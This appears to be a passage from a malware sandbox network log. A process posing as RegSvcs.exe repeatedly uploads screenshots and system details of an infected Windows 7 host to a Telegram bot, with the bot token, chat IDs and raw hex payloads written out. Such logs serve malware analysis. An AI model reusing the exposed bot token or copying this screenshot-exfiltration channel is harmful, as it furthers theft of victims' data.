89 fe 95 57 4e 39 Data Ascii: 4%&'()*56789:CDEFGHIJSTUVWXYZcdefghijstuvwxyz?.J"6\|Fj/GwLwUn+m${1U%!#~?c.mlkm-%uO.)w"0zgWN9
2022-04-08 10:14:26 UTC	1805	OUT	Data Raw: da 5b a5 b5 d8 57 44 07 13 3d db 4d 23 12 73 ce 51 7d 7f 41 5a 07 fd 62 9f 63 fd 28 cd 14 80 a1 aa 42 b3 bc 48 e2 6c 00 5b f7 52 04 3c 32 f7 c8 e3 fc fb d6 34 96 f7 12 ea b1 dc 03 2b a5 b6 e0 a8 5c 64 2b 80 31 bb 7f 5f 94 f3 d7 d6 ba 39 ed ad ee 54 0b 88 23 94 0e 40 91 03 63 f3 a8 7f b2 f4 ef f9 f0 b5 ff 00 bf 2b fe 15 49 a1 6a 67 e8 11 18 af af c1 59 01 65 46 fd e4 9b cf 2c e7 ae 4f 15 1a 69 57 43 4c 36 de 58 da 60 2c 53 70 ff 00 5b b7 6e 3e 9d 0f d4 56 d4 16 b6 d6 bb be cf 6f 14 3b be f7 96 81 73 f5 c5 4b 9a 4f 56 35 a1 90 96 13 7f 6c 8b 89 56 62 14 2f 96 e8 63 da a0 2e 0a 9c fc dd 73 d3 8e 6a ac b6 f1 69 da 7d 87 da e0 8b cb 45 6f 36 26 74 52 64 c0 c3 72 40 24 60 8e 0e 79 e2 ba 1c d1 9a 4c 11 cf c1 a7 4f 22 e9 ad 2c 73 f9 71 c0 80 79 7b 33 1b 03 92 4e Data Ascii: [WD=M#sQ}AZbc(BHl[R<24+\d+1_9T#@c+IjgYeF,OiWCL6X`,Sp[n>Vo;sKOV5lVb/c.sji}Eo6&tRdr@$`yLO",sqy{3N
2022-04-08 10:14:26 UTC	1820	OUT	Data Raw: bf 4f f0 a3 69 fe fb 7e 9f e1 40 0f a6 47 f7 4f d4 ff 00 3a 36 9f ef b7 e9 fe 14 d4 53 b7 ef b7 53 e9 eb 40 12 d1 4c da 7f be df a7 f8 51 b4 ff 00 7d bf 4f f0 a0 07 d1 4c da 7f be df a7 f8 51 b4 ff 00 7d bf 4f f0 a0 07 d1 4c da 7f be df a7 f8 51 b4 ff 00 7d bf 4f f0 a0 07 d3 23 fb a7 ea 7f 9d 1b 4f f7 db f4 ff 00 0a 6a 29 db f7 db a9 f4 f5 a0 09 68 a6 6d 3f df 6f d3 fc 28 da 7f be df a7 f8 50 03 e8 a6 6d 3f df 6f d3 fc 28 da 7f be df a7 f8 50 03 e8 a6 6d 3f df 6f d3 fc 28 da 7f be df a7 f8 50 03 e9 91 fd d3 f5 3f ce 8d a7 fb ed fa 7f 85 35 14 ed fb ed d4 fa 7a d0 04 b4 53 36 9f ef b7 e9 fe 14 6d 3f df 6f d3 fc 28 01 f4 53 36 9f ef b7 e9 fe 14 6d 3f df 6f d3 fc 28 01 f4 53 36 9f ef b7 e9 fe 14 6d 3f df 6f d3 fc 28 01 f4 c8 fe e9 fa 9f e7 46 d3 fd f6 fd 3f Data Ascii: Oi~@GO:6SS@LQ}OLQ}OLQ}O#Oj)hm?o(Pm?o(Pm?o(P?5zS6m?o(S6m?o(S6m?o(F?
2022-04-08 10:14:26 UTC	1836	OUT	Data Raw: 4d 1b c7 a3 7f df 26 80 1f 4c 8f ee 9f a9 fe 74 6f 1e 8d ff 00 7c 9a 6a 38 0b d1 ba 9f e1 3e b4 01 2d 14 cd e3 d1 bf ef 93 46 f1 e8 df f7 c9 a0 07 d1 4c de 3d 1b fe f9 34 6f 1e 8d ff 00 7c 9a 00 7d 14 cd e3 d1 bf ef 93 46 f1 e8 df f7 c9 a0 07 d3 23 fb a7 ea 7f 9d 1b c7 a3 7f df 26 9a 8e 02 f4 6e a7 f8 4f ad 00 4b 45 33 78 f4 6f fb e4 d1 bc 7a 37 fd f2 68 01 f4 53 37 8f 46 ff 00 be 4d 1b c7 a3 7f df 26 80 1f 45 33 78 f4 6f fb e4 d1 bc 7a 37 fd f2 68 01 f4 c8 fe e9 fa 9f e7 46 f1 e8 df f7 c9 a6 a3 80 bd 1b a9 fe 13 eb 40 12 d1 4c de 3d 1b fe f9 34 6f 1e 8d ff 00 7c 9a 00 7d 14 cd e3 d1 bf ef 93 46 f1 e8 df f7 c9 a0 07 d1 4c de 3d 1b fe f9 34 6f 1e 8d ff 00 7c 9a 00 7d 32 3f ba 7e a7 f9 d1 bc 7a 37 fd f2 69 a8 e0 2f 46 ea 7f 84 fa d0 04 b4 53 37 8f 46 ff 00 Data Ascii: M&Lto\|j8>-FL=4o\|}F#&nOKE3xoz7hS7FM&E3xoz7hF@L=4o\|}FL=4o\|}2?~z7i/FS7F
2022-04-08 10:14:26 UTC	1852	OUT	Data Raw: fe e9 fa 9f e7 46 d3 fd f6 fd 3f c2 9a 8a 76 fd f6 ea 7d 3d 68 02 5a 29 9b 4f f7 db f4 ff 00 0a 36 9f ef b7 e9 fe 14 00 fa 29 9b 4f f7 db f4 ff 00 0a 36 9f ef b7 e9 fe 14 00 fa 29 9b 4f f7 db f4 ff 00 0a 36 9f ef b7 e9 fe 14 00 fa 64 7f 74 fd 4f f3 a3 69 fe fb 7e 9f e1 4d 45 3b 7e fb 75 3e 9e b4 01 2d 14 cd a7 fb ed fa 7f 85 1b 4f f7 db f4 ff 00 0a 00 7d 14 cd a7 fb ed fa 7f 85 1b 4f f7 db f4 ff 00 0a 00 7d 14 cd a7 fb ed fa 7f 85 1b 4f f7 db f4 ff 00 0a 00 7d 32 3f ba 7e a7 f9 d1 b4 ff 00 7d bf 4f f0 a6 a2 9d bf 7d ba 9f 4f 5a 00 96 8a 66 d3 fd f6 fd 3f c2 8d a7 fb ed fa 7f 85 00 3e 8a 66 d3 fd f6 fd 3f c2 8d a7 fb ed fa 7f 85 00 3e 8a 66 d3 fd f6 fd 3f c2 8d a7 fb ed fa 7f 85 00 3e 99 1f dd 3f 53 fc e8 da 7f be df a7 f8 53 51 4e df be dd 4f a7 ad 00 4b Data Ascii: F?v}=hZ)O6)O6)O6dtOi~ME;~u>-O}O}O}2?~}O}OZf?>f?>f?>?SSQNOK
2022-04-08 10:14:26 UTC	1868	OUT	Data Raw: e4 d1 bc 7a 37 fd f2 68 01 f4 53 37 8f 46 ff 00 be 4d 1b c7 a3 7f df 26 80 1f 45 33 78 f4 6f fb e4 d1 bc 7a 37 fd f2 68 01 f4 c8 fe e9 fa 9f e7 46 f1 e8 df f7 c9 a6 a3 80 bd 1b a9 fe 13 eb 40 12 d1 4c de 3d 1b fe f9 34 6f 1e 8d ff 00 7c 9a 00 7d 14 cd e3 d1 bf ef 93 46 f1 e8 df f7 c9 a0 07 d1 4c de 3d 1b fe f9 34 6f 1e 8d ff 00 7c 9a 00 7d 32 3f ba 7e a7 f9 d1 bc 7a 37 fd f2 69 a8 e0 2f 46 ea 7f 84 fa d0 04 b4 53 37 8f 46 ff 00 be 4d 1b c7 a3 7f df 26 80 1f 45 33 78 f4 6f fb e4 d1 bc 7a 37 fd f2 68 01 f4 53 37 8f 46 ff 00 be 4d 1b c7 a3 7f df 26 80 1f 4c 8f ee 9f a9 fe 74 6f 1e 8d ff 00 7c 9a 6a 38 0b d1 ba 9f e1 3e b4 01 2d 14 cd e3 d1 bf ef 93 46 f1 e8 df f7 c9 a0 07 d1 4c de 3d 1b fe f9 34 6f 1e 8d ff 00 7c 9a 00 7d 14 cd e3 d1 bf ef 93 46 f1 e8 df f7 Data Ascii: z7hS7FM&E3xoz7hF@L=4o\|}FL=4o\|}2?~z7i/FS7FM&E3xoz7hS7FM&Lto\|j8>-FL=4o\|}F
2022-04-08 10:14:26 UTC	1883	OUT	Data Raw: 45 14 00 53 23 fb a7 ea 7f 9d 3e 99 1f dd 3f 53 fc e8 01 f4 51 45 00 14 51 45 00 14 51 45 00 14 c8 fe e9 fa 9f e7 4f a6 47 f7 4f d4 ff 00 3a 00 7d 14 51 40 05 14 51 40 05 14 51 40 05 32 3f ba 7e a7 f9 d3 e9 91 fd d3 f5 3f ce 80 1f 55 67 ff 00 8f d8 7f eb 9b ff 00 35 ab 55 56 7f f8 fd 87 fe b9 bf f3 5a 00 6b d5 3b 7f f9 08 3f fc 0b f9 47 57 1e a9 db ff 00 c8 41 ff 00 e0 5f ca 3a a1 13 6c 6f f9 ea ff 00 90 ff 00 0a 36 37 fc f5 7f c8 7f 85 67 eb 1e 64 71 99 a3 33 a9 50 0e f5 93 09 1e 0f 25 94 1c b7 1d b0 7a 76 a4 be 2f 15 dc 13 2b 4e aa d2 26 e9 0c 9f bb 0a 78 db b4 1e fe a4 77 eb 48 0d 1d 8d ff 00 3d 5f f2 1f e1 56 6d 14 fd 9c 7c ed f7 9b d3 d4 fb 57 3f 6f 73 2b 5d 24 f3 a3 94 92 e1 a2 42 b3 b0 db 82 40 05 3a 76 eb c9 e6 ba 2b 3f f8 f7 1f ef 37 fe 84 68 e8 Data Ascii: ES#>?SQEQEQEOGO:}Q@Q@Q@2?~?Ug5UVZk;?GWA_:lo67gdq3P%zv/+N&xwH=_Vm\|W?os+]$B@:v+?7h
2022-04-08 10:14:26 UTC	1899	OUT	Data Raw: d4 94 da 23 b9 3f b8 ff 00 81 a7 fe 86 2a 36 fb d2 ff 00 be bf c9 69 6e 0f ee 0f fb e9 ff 00 a1 ad 34 fd e9 7f de 5f e4 b5 e9 1c 05 dd 1c ed d3 94 7f d3 59 bf f4 6b d5 8b b9 0a 59 cc ea 79 58 d8 8f ca aa e9 df 2d 92 0f f6 e4 ff 00 d1 8d 4e be 7c 58 5c 7f d7 26 fe 55 94 96 8c bb e8 37 50 b6 92 44 09 6c ee 8d 17 0a aa c4 64 0e d5 91 79 35 ed e5 c5 ad bc 2c f0 ae dc c9 2a 12 3a 75 27 1e df 99 ad 0d 62 fd ed 62 b8 10 9c 4c e4 a2 11 fc 23 b9 aa 1a 4d cc 96 b6 50 dc 09 3c cd 87 64 9c 11 8f 6f 7e 31 cd 72 49 f2 ca eb e6 64 da b9 78 5e 44 14 2c 79 65 51 80 58 e4 9f af bd 3a 19 37 ea 4a dd 33 6c bf fa 1b d5 b9 a2 b4 bd 89 66 7b 71 28 71 90 f1 70 f8 fe 75 59 2c a3 b6 9a 39 a3 9e 49 16 44 d8 a9 22 e0 a8 04 9f e6 de 95 b4 13 e6 1a 4d 32 e6 ea a9 7a 73 3c 1f ee c9 fc Data Ascii: #?6in4_YkYyX-N\|X\&U7PDldy5,:u'bbL#MP<do~1rIdx^D,yeQX:7J3lf{q(qpuY,9ID"M2zs<
2022-04-08 10:14:26 UTC	1902	OUT	Data Raw: 0d 0a 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 38 64 61 31 39 37 65 33 38 62 34 63 62 30 32 2d 2d 0d 0a Data Ascii: -----------------------------8da197e38b4cb02--
2022-04-08 10:14:26 UTC	1902	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 Date: Fri, 08 Apr 2022 10:14:26 GMT Content-Type: application/json Content-Length: 833 Connection: close Strict-Transport-Security: max-age=31536000; includeSubDomains; preload Access-Control-Allow-Origin: * Access-Control-Allow-Methods: GET, POST, OPTIONS Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection {"ok":true,"result":{"message_id":136,"from":{"id":5008280971,"is_bot":true,"first_name":"gods_child_bot","username":"gods_childbot"},"chat":{"id":5019146869,"first_name":"Love","last_name":"Word","username":"tgman1","type":"private"},"date":1649412866,"document":{"file_name":"user-082561 2022-04-08 04-38-33.jpeg","mime_type":"image/jpeg","thumb":{"file_id":"AAMCBAADGQMAA4hiUAsCbt-QaOxP9gJvwY07KmRLFwAC_AoAAkCUgFJFsNKZ05BMoAEAB20AAyME","file_unique_id":"AQAD_AoAAkCUgFJy","file_size":14418,"width":320,"height":256},"file_id":"BQACAgQAAxkDAAOIYlALAm7fkGjsT_YCb8GNOypkSxcAAvwKAAJAlIBSRbDSmdOQTKAjBA","file_unique_id":"AgAD_AoAAkCUgFI","file_size":116302},"caption":"New Screenshot Recovered!\n\nUser Name: user/082561\nOSFullName: Microsoft Windows 7 Professional \nCPU: Intel(R) Core(TM)2 CPU 6600 @ 2.40 GHz\nRAM: 8191.25 MB"}}

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
16	192.168.2.22	49187	149.154.167.220	443	C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe

Timestamp	kBytes transferred	Direction	Data
2022-04-08 10:14:31 UTC	1903	OUT	POST /bot5008280971:AAFemDWjmiprlWos2qK6VdoxhprMtzrVZRU/sendDocument HTTP/1.1 Content-Type: multipart/form-data; boundary=---------------------------8da198104356572 Host: api.telegram.org Content-Length: 116890 Expect: 100-continue Connection: Keep-Alive
2022-04-08 10:14:31 UTC	1903	IN	HTTP/1.1 100 Continue
2022-04-08 10:14:31 UTC	1903	OUT	Data Raw: 0d 0a 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 38 64 61 31 39 38 31 30 34 33 35 36 35 37 32 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 63 68 61 74 5f 69 64 22 0d 0a 0d 0a 35 30 31 39 31 34 36 38 36 39 0d 0a 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 38 64 61 31 39 38 31 30 34 33 35 36 35 37 32 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 63 61 70 74 69 6f 6e 22 0d 0a 0d 0a 4e 65 77 20 53 63 72 65 65 6e 73 68 6f 74 20 52 65 63 6f 76 65 72 65 64 21 0a 0a 55 73 65 72 20 4e 61 6d 65 3a 20 41 6c 62 75 73 2f 30 38 32 35 36 Data Ascii: -----------------------------8da198104356572Content-Disposition: form-data; name="chat_id"5019146869-----------------------------8da198104356572Content-Disposition: form-data; name="caption"New Screenshot Recovered!User Name: user/08256
2022-04-08 10:14:31 UTC	1904	OUT	Data Raw: 34 e1 25 f1 17 18 19 1a 26 27 28 29 2a 35 36 37 38 39 3a 43 44 45 46 47 48 49 4a 53 54 55 56 57 58 59 5a 63 64 65 66 67 68 69 6a 73 74 75 76 77 78 79 7a 82 83 84 85 86 87 88 89 8a 92 93 94 95 96 97 98 99 9a a2 a3 a4 a5 a6 a7 a8 a9 aa b2 b3 b4 b5 b6 b7 b8 b9 ba c2 c3 c4 c5 c6 c7 c8 c9 ca d2 d3 d4 d5 d6 d7 d8 d9 da e2 e3 e4 e5 e6 e7 e8 e9 ea f2 f3 f4 f5 f6 f7 f8 f9 fa ff da 00 0c 03 01 00 02 11 03 11 00 3f 00 ec 2e af 8c 4a cf bd 22 8c 36 cd cd 19 7c 91 d7 80 46 07 6a 85 2f a4 96 f0 da 47 77 03 4c 06 e2 05 b3 10 07 ae 77 e3 bd 55 d4 6e 85 b6 97 2b 6d 0e cd 24 aa aa 7b 9f 31 a9 ba 03 c3 81 b5 55 25 b8 db 21 23 f8 b1 d4 7e 1c fe b5 8f 3f bd 63 2e 6d 6c 6b da dd 19 6d 2d 25 75 f9 ae 11 4f cb d0 12 bb bf 2e 29 d7 77 22 d6 1f 30 ae ee 7a 67 1d 89 fe 95 57 4e 39 Data Ascii: 4%&'()*56789:CDEFGHIJSTUVWXYZcdefghijstuvwxyz?.J"6\|Fj/GwLwUn+m${1U%!#~?c.mlkm-%uO.)w"0zgWN9
2022-04-08 10:14:31 UTC	1920	OUT	Data Raw: da 5b a5 b5 d8 57 44 07 13 3d db 4d 23 12 73 ce 51 7d 7f 41 5a 07 fd 62 9f 63 fd 28 cd 14 80 a1 aa 42 b3 bc 48 e2 6c 00 5b f7 52 04 3c 32 f7 c8 e3 fc fb d6 34 96 f7 12 ea b1 dc 03 2b a5 b6 e0 a8 5c 64 2b 80 31 bb 7f 5f 94 f3 d7 d6 ba 39 ed ad ee 54 0b 88 23 94 0e 40 91 03 63 f3 a8 7f b2 f4 ef f9 f0 b5 ff 00 bf 2b fe 15 49 a1 6a 67 e8 11 18 af af c1 59 01 65 46 fd e4 9b cf 2c e7 ae 4f 15 1a 69 57 43 4c 36 de 58 da 60 2c 53 70 ff 00 5b b7 6e 3e 9d 0f d4 56 d4 16 b6 d6 bb be cf 6f 14 3b be f7 96 81 73 f5 c5 4b 9a 4f 56 35 a1 90 96 13 7f 6c 8b 89 56 62 14 2f 96 e8 63 da a0 2e 0a 9c fc dd 73 d3 8e 6a ac b6 f1 69 da 7d 87 da e0 8b cb 45 6f 36 26 74 52 64 c0 c3 72 40 24 60 8e 0e 79 e2 ba 1c d1 9a 4c 11 cf c1 a7 4f 22 e9 ad 2c 73 f9 71 c0 80 79 7b 33 1b 03 92 4e Data Ascii: [WD=M#sQ}AZbc(BHl[R<24+\d+1_9T#@c+IjgYeF,OiWCL6X`,Sp[n>Vo;sKOV5lVb/c.sji}Eo6&tRdr@$`yLO",sqy{3N
2022-04-08 10:14:31 UTC	1936	OUT	Data Raw: bf 4f f0 a3 69 fe fb 7e 9f e1 40 0f a6 47 f7 4f d4 ff 00 3a 36 9f ef b7 e9 fe 14 d4 53 b7 ef b7 53 e9 eb 40 12 d1 4c da 7f be df a7 f8 51 b4 ff 00 7d bf 4f f0 a0 07 d1 4c da 7f be df a7 f8 51 b4 ff 00 7d bf 4f f0 a0 07 d1 4c da 7f be df a7 f8 51 b4 ff 00 7d bf 4f f0 a0 07 d3 23 fb a7 ea 7f 9d 1b 4f f7 db f4 ff 00 0a 6a 29 db f7 db a9 f4 f5 a0 09 68 a6 6d 3f df 6f d3 fc 28 da 7f be df a7 f8 50 03 e8 a6 6d 3f df 6f d3 fc 28 da 7f be df a7 f8 50 03 e8 a6 6d 3f df 6f d3 fc 28 da 7f be df a7 f8 50 03 e9 91 fd d3 f5 3f ce 8d a7 fb ed fa 7f 85 35 14 ed fb ed d4 fa 7a d0 04 b4 53 36 9f ef b7 e9 fe 14 6d 3f df 6f d3 fc 28 01 f4 53 36 9f ef b7 e9 fe 14 6d 3f df 6f d3 fc 28 01 f4 53 36 9f ef b7 e9 fe 14 6d 3f df 6f d3 fc 28 01 f4 c8 fe e9 fa 9f e7 46 d3 fd f6 fd 3f Data Ascii: Oi~@GO:6SS@LQ}OLQ}OLQ}O#Oj)hm?o(Pm?o(Pm?o(P?5zS6m?o(S6m?o(S6m?o(F?
2022-04-08 10:14:31 UTC	1952	OUT	Data Raw: 4d 1b c7 a3 7f df 26 80 1f 4c 8f ee 9f a9 fe 74 6f 1e 8d ff 00 7c 9a 6a 38 0b d1 ba 9f e1 3e b4 01 2d 14 cd e3 d1 bf ef 93 46 f1 e8 df f7 c9 a0 07 d1 4c de 3d 1b fe f9 34 6f 1e 8d ff 00 7c 9a 00 7d 14 cd e3 d1 bf ef 93 46 f1 e8 df f7 c9 a0 07 d3 23 fb a7 ea 7f 9d 1b c7 a3 7f df 26 9a 8e 02 f4 6e a7 f8 4f ad 00 4b 45 33 78 f4 6f fb e4 d1 bc 7a 37 fd f2 68 01 f4 53 37 8f 46 ff 00 be 4d 1b c7 a3 7f df 26 80 1f 45 33 78 f4 6f fb e4 d1 bc 7a 37 fd f2 68 01 f4 c8 fe e9 fa 9f e7 46 f1 e8 df f7 c9 a6 a3 80 bd 1b a9 fe 13 eb 40 12 d1 4c de 3d 1b fe f9 34 6f 1e 8d ff 00 7c 9a 00 7d 14 cd e3 d1 bf ef 93 46 f1 e8 df f7 c9 a0 07 d1 4c de 3d 1b fe f9 34 6f 1e 8d ff 00 7c 9a 00 7d 32 3f ba 7e a7 f9 d1 bc 7a 37 fd f2 69 a8 e0 2f 46 ea 7f 84 fa d0 04 b4 53 37 8f 46 ff 00 Data Ascii: M&Lto\|j8>-FL=4o\|}F#&nOKE3xoz7hS7FM&E3xoz7hF@L=4o\|}FL=4o\|}2?~z7i/FS7F
2022-04-08 10:14:31 UTC	1967	OUT	Data Raw: fe e9 fa 9f e7 46 d3 fd f6 fd 3f c2 9a 8a 76 fd f6 ea 7d 3d 68 02 5a 29 9b 4f f7 db f4 ff 00 0a 36 9f ef b7 e9 fe 14 00 fa 29 9b 4f f7 db f4 ff 00 0a 36 9f ef b7 e9 fe 14 00 fa 29 9b 4f f7 db f4 ff 00 0a 36 9f ef b7 e9 fe 14 00 fa 64 7f 74 fd 4f f3 a3 69 fe fb 7e 9f e1 4d 45 3b 7e fb 75 3e 9e b4 01 2d 14 cd a7 fb ed fa 7f 85 1b 4f f7 db f4 ff 00 0a 00 7d 14 cd a7 fb ed fa 7f 85 1b 4f f7 db f4 ff 00 0a 00 7d 14 cd a7 fb ed fa 7f 85 1b 4f f7 db f4 ff 00 0a 00 7d 32 3f ba 7e a7 f9 d1 b4 ff 00 7d bf 4f f0 a6 a2 9d bf 7d ba 9f 4f 5a 00 96 8a 66 d3 fd f6 fd 3f c2 8d a7 fb ed fa 7f 85 00 3e 8a 66 d3 fd f6 fd 3f c2 8d a7 fb ed fa 7f 85 00 3e 8a 66 d3 fd f6 fd 3f c2 8d a7 fb ed fa 7f 85 00 3e 99 1f dd 3f 53 fc e8 da 7f be df a7 f8 53 51 4e df be dd 4f a7 ad 00 4b Data Ascii: F?v}=hZ)O6)O6)O6dtOi~ME;~u>-O}O}O}2?~}O}OZf?>f?>f?>?SSQNOK
2022-04-08 10:14:31 UTC	1983	OUT	Data Raw: e4 d1 bc 7a 37 fd f2 68 01 f4 53 37 8f 46 ff 00 be 4d 1b c7 a3 7f df 26 80 1f 45 33 78 f4 6f fb e4 d1 bc 7a 37 fd f2 68 01 f4 c8 fe e9 fa 9f e7 46 f1 e8 df f7 c9 a6 a3 80 bd 1b a9 fe 13 eb 40 12 d1 4c de 3d 1b fe f9 34 6f 1e 8d ff 00 7c 9a 00 7d 14 cd e3 d1 bf ef 93 46 f1 e8 df f7 c9 a0 07 d1 4c de 3d 1b fe f9 34 6f 1e 8d ff 00 7c 9a 00 7d 32 3f ba 7e a7 f9 d1 bc 7a 37 fd f2 69 a8 e0 2f 46 ea 7f 84 fa d0 04 b4 53 37 8f 46 ff 00 be 4d 1b c7 a3 7f df 26 80 1f 45 33 78 f4 6f fb e4 d1 bc 7a 37 fd f2 68 01 f4 53 37 8f 46 ff 00 be 4d 1b c7 a3 7f df 26 80 1f 4c 8f ee 9f a9 fe 74 6f 1e 8d ff 00 7c 9a 6a 38 0b d1 ba 9f e1 3e b4 01 2d 14 cd e3 d1 bf ef 93 46 f1 e8 df f7 c9 a0 07 d1 4c de 3d 1b fe f9 34 6f 1e 8d ff 00 7c 9a 00 7d 14 cd e3 d1 bf ef 93 46 f1 e8 df f7 Data Ascii: z7hS7FM&E3xoz7hF@L=4o\|}FL=4o\|}2?~z7i/FS7FM&E3xoz7hS7FM&Lto\|j8>-FL=4o\|}F
2022-04-08 10:14:31 UTC	1999	OUT	Data Raw: 45 14 00 53 23 fb a7 ea 7f 9d 3e 99 1f dd 3f 53 fc e8 01 f4 51 45 00 14 51 45 00 14 51 45 00 14 c8 fe e9 fa 9f e7 4f a6 47 f7 4f d4 ff 00 3a 00 7d 14 51 40 05 14 51 40 05 14 51 40 05 32 3f ba 7e a7 f9 d3 e9 91 fd d3 f5 3f ce 80 1f 55 67 ff 00 8f d8 7f eb 9b ff 00 35 ab 55 56 7f f8 fd 87 fe b9 bf f3 5a 00 6b d5 3b 7f f9 08 3f fc 0b f9 47 57 1e a9 db ff 00 c8 41 ff 00 e0 5f ca 3a a1 13 6c 6f f9 ea ff 00 90 ff 00 0a 36 37 fc f5 7f c8 7f 85 67 eb 1e 64 71 99 a3 33 a9 50 0e f5 93 09 1e 0f 25 94 1c b7 1d b0 7a 76 a4 be 2f 15 dc 13 2b 4e aa d2 26 e9 0c 9f bb 0a 78 db b4 1e fe a4 77 eb 48 0d 1d 8d ff 00 3d 5f f2 1f e1 56 6d 14 fd 9c 7c ed f7 9b d3 d4 fb 57 3f 6f 73 2b 5d 24 f3 a3 94 92 e1 a2 42 b3 b0 db 82 40 05 3a 76 eb c9 e6 ba 2b 3f f8 f7 1f ef 37 fe 84 68 e8 Data Ascii: ES#>?SQEQEQEOGO:}Q@Q@Q@2?~?Ug5UVZk;?GWA_:lo67gdq3P%zv/+N&xwH=_Vm\|W?os+]$B@:v+?7h
2022-04-08 10:14:31 UTC	2015	OUT	Data Raw: d4 94 da 23 b9 3f b8 ff 00 81 a7 fe 86 2a 36 fb d2 ff 00 be bf c9 69 6e 0f ee 0f fb e9 ff 00 a1 ad 34 fd e9 7f de 5f e4 b5 e9 1c 05 dd 1c ed d3 94 7f d3 59 bf f4 6b d5 8b b9 0a 59 cc ea 79 58 d8 8f ca aa e9 df 2d 92 0f f6 e4 ff 00 d1 8d 4e be 7c 58 5c 7f d7 26 fe 55 94 96 8c bb e8 37 50 b6 92 44 09 6c ee 8d 17 0a aa c4 64 0e d5 91 79 35 ed e5 c5 ad bc 2c f0 ae dc c9 2a 12 3a 75 27 1e df 99 ad 0d 62 fd ed 62 b8 10 9c 4c e4 a2 11 fc 23 b9 aa 1a 4d cc 96 b6 50 dc 09 3c cd 87 64 9c 11 8f 6f 7e 31 cd 72 49 f2 ca eb e6 64 da b9 78 5e 44 14 2c 79 65 51 80 58 e4 9f af bd 3a 19 37 ea 4a dd 33 6c bf fa 1b d5 b9 a2 b4 bd 89 66 7b 71 28 71 90 f1 70 f8 fe 75 59 2c a3 b6 9a 39 a3 9e 49 16 44 d8 a9 22 e0 a8 04 9f e6 de 95 b4 13 e6 1a 4d 32 e6 ea a9 7a 73 3c 1f ee c9 fc Data Ascii: #?6in4_YkYyX-N\|X\&U7PDldy5,:u'bbL#MP<do~1rIdx^D,yeQX:7J3lf{q(qpuY,9ID"M2zs<
2022-04-08 10:14:31 UTC	2017	OUT	Data Raw: 0d 0a 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 38 64 61 31 39 38 31 30 34 33 35 36 35 37 32 2d 2d 0d 0a Data Ascii: -----------------------------8da198104356572--
2022-04-08 10:14:32 UTC	2017	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 Date: Fri, 08 Apr 2022 10:14:32 GMT Content-Type: application/json Content-Length: 833 Connection: close Strict-Transport-Security: max-age=31536000; includeSubDomains; preload Access-Control-Allow-Origin: * Access-Control-Allow-Methods: GET, POST, OPTIONS Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection {"ok":true,"result":{"message_id":137,"from":{"id":5008280971,"is_bot":true,"first_name":"gods_child_bot","username":"gods_childbot"},"chat":{"id":5019146869,"first_name":"Love","last_name":"Word","username":"tgman1","type":"private"},"date":1649412872,"document":{"file_name":"user-082561 2022-04-08 04-58-33.jpeg","mime_type":"image/jpeg","thumb":{"file_id":"AAMCBAADGQMAA4liUAsIk5KZahMTTHplM18Wp4rQcwAC_QoAAkCUgFJkMbWtuDBfZQEAB20AAyME","file_unique_id":"AQAD_QoAAkCUgFJy","file_size":14418,"width":320,"height":256},"file_id":"BQACAgQAAxkDAAOJYlALCJOSmWoTE0x6ZTNfFqeK0HMAAv0KAAJAlIBSZDG1rbgwX2UjBA","file_unique_id":"AgAD_QoAAkCUgFI","file_size":116302},"caption":"New Screenshot Recovered!\n\nUser Name: user/082561\nOSFullName: Microsoft Windows 7 Professional \nCPU: Intel(R) Core(TM)2 CPU 6600 @ 2.40 GHz\nRAM: 8191.25 MB"}}

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
17	192.168.2.22	49188	149.154.167.220	443	C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe

Timestamp	kBytes transferred	Direction	Data
2022-04-08 10:14:37 UTC	2019	OUT	POST /bot5008280971:AAFemDWjmiprlWos2qK6VdoxhprMtzrVZRU/sendDocument HTTP/1.1 Content-Type: multipart/form-data; boundary=---------------------------8da1983cfbb680e Host: api.telegram.org Content-Length: 116890 Expect: 100-continue Connection: Keep-Alive
2022-04-08 10:14:37 UTC	2019	IN	HTTP/1.1 100 Continue
2022-04-08 10:14:37 UTC	2019	OUT	Data Raw: 0d 0a 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 38 64 61 31 39 38 33 63 66 62 62 36 38 30 65 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 63 68 61 74 5f 69 64 22 0d 0a 0d 0a 35 30 31 39 31 34 36 38 36 39 0d 0a 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 38 64 61 31 39 38 33 63 66 62 62 36 38 30 65 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 63 61 70 74 69 6f 6e 22 0d 0a 0d 0a 4e 65 77 20 53 63 72 65 65 6e 73 68 6f 74 20 52 65 63 6f 76 65 72 65 64 21 0a 0a 55 73 65 72 20 4e 61 6d 65 3a 20 41 6c 62 75 